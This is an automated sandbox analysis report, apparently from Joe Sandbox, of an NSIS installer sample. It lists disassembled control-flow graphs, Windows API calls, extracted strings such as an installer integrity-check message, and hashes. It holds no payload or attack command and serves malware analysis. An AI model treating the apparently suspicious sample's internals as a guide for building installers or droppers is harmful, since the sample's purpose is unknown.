                                                                                                                                                                                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ManufactureJazz
                                                                                                                                                                                                                                                                                                                                      • API String ID: 4286501637-218748646
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                                                                                      • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                                                                                      • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                                                                                      • API String ID: 651206458-1535804072
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(006254B8), ref: 00402387
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                                                      • String ID: Exch: stack < %d elements$ManufactureJazz$Pop: stack empty
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1459762280-4110350024
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(006254B8), ref: 00402387
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
